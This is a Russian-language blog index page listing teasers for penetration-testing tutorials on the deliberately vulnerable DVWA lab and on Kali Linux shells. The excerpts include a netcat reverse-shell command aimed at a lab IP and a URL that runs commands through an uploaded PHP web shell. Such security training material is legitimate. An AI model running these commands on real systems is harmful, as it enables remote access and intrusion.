Свежие записи

Most Used Categories

DVWA, File Upload, Уязвимости

#5 Уязвимость DVWA File Upload (Уровень High).

Просмотров: 659

Здравствуйте, дорогие друзья. Продолжаем рассматривать уязвимости загрузки файлов, и в данном уроке рассмотрим высокий уровень безопасности (уровень high) File Upload. Для начала нам нужно отредактировать наш шелл для последующего открытия на сервере. Это простой текст в коде html

by Timcore1 Min Reading
DVWA, File Upload, Уязвимости

#4 Уязвимость DVWA. File Upload (Уровень Medium).

Просмотров: 834

Здравствуйте, дорогие друзья. Продолжаем рассматривать уязвимости DVWA, и остановимся на загрузке файлов со средним уровнем настроек безопасности.

Мы можем обойти защиту DVWA, при помощи инструмента BurpSuite.

Для начала установим настройки безопасности на уровень Medium:

уровень настроек безопасности dvwa - medium

Переходим на …

by Timcore1 Min Reading
DVWA, File Upload, Уязвимости

#3 Уязвимость DVWA — File Upload (Уровень Low).

Просмотров: 858

Здравствуйте, дорогие друзья. Продолжаем рассматривать уязвимости DVWA, и сегодня остановимся на загрузке файлов с низкими настройками безопасности.

Суть этой уязвимости заключается в том, чтобы «залить» php-шелл на сервер, и после этого проэксплуатировать его.

Перейдем к практике, и выставим …

by Timcore1 Min Reading
Brute Force (Брутфорс), DVWA, Уязвимости

#2 Уязвимость DVWA. Brute Force (Уровень Low).

Просмотров: 1 290

Здравствуйте, дорогие друзья. Продолжаем рассматривать уязвимости веб-приложения DVWA, и затронем тему Брутфорса или метода грубой силы.

В качестве инструментов для реализации данной атаки нам понадобится BurpSuite и Hydra, где нам нужно будет узнать пароль на уязвимой странице.

Предполагается, …

by Timcore1 Min Reading
DVWA, SQL-Injection, Уязвимости

#1 Уязвимость DVWA. SQL-Injection (уровень Low).

Просмотров: 2 477

Здравствуйте, дорогие друзья.

Давайте рассмотрим уязвимости веб-приложения DVWA, в частности SQL-инъекцию на уровне Low. Думаю, Вы уже знаете, что такое SQL-инъекция, поэтому сразу перейдем к практике.

Выставим значение уровня безопасности на Low:

dvwa security low

Перейдем на вкладку …

by Timcore1 Min Reading
Kali Linux

#50 Kali Linux для начинающих. Завершение цикла статей.

Просмотров: 350

Это было долгое путешествие, на протяжении которого я очень много разговаривал, и надеюсь, Вы тоже взламывали и наслаждались.

Мы научились очень многому в этом цикле статей, и затронули огромное количество тем. Мы познакомились с уязвимостями, которые очень легко использовать, а …

by Timcore
Kali Linux

#49 Kali Linux для начинающих. Создаем бэкдор Metasploit.

Просмотров: 2 333

В этой лекции Вы научитесь создавать бэкдор, с помощью которого Вы сможете получить шелл Meterpreter, который Вы будете использовать вместе с Metasploit. Вместо обычного шелла netcat-a, Вы получите более продвинутый шелл meterpreter-a.  Должен сказать, что если …

by Timcore1 Min Reading
Kali Linux

#48 Kali Linux для начинающих. Что такое Reverse (обратный) шелл?

Просмотров: 812

Позвольте продемонстрировать как выглядит Reverse Shell. Вместо того, чтобы прослушивать порт, я скажу, запусти bash шелл. Нужно в адресной строке указать айпи адрес машины на Kali Linux и на порт 1234:

nc -e /bin/bash 192.168.119.128 1234

После того, как я нажму клавишу «…

by Timcore1 Min Reading
Kali Linux

#47 Kali Linux для начинающих. Что такое Bind Shell?

Просмотров: 541

Продолжаем рассматривать шеллы, и попробуем расширить доступ еще немного. Давайте проверим, запущен ли в системе netcat. Вводим команду: «http://192.168.119.130/dvwa/hackable/uploads/shell.php?cmd=nc -h»:

http://192.168.119.130/dvwa/hackable/uploads/shell.php?cmd=nc -h

Это справка о netcat, а это значит, что он установлен. Он работает фактически на всех линукс …

by Timcore1 Min Reading
Kali Linux

#46 Kali Linux для начинающих. Разбираемся с базовыми веб-шеллами.

Просмотров: 709

Давайте попробуем подключиться к открытому порту, с помощью netcat. В этом разделе мы рассмотрим получение доступа к шеллу. Давайте воспользуемся инструментом «netcat», для подключения к открытому порту.

Для примера подключимся к 80-му порту. Команда выглядит как: «…

by Timcore1 Min Reading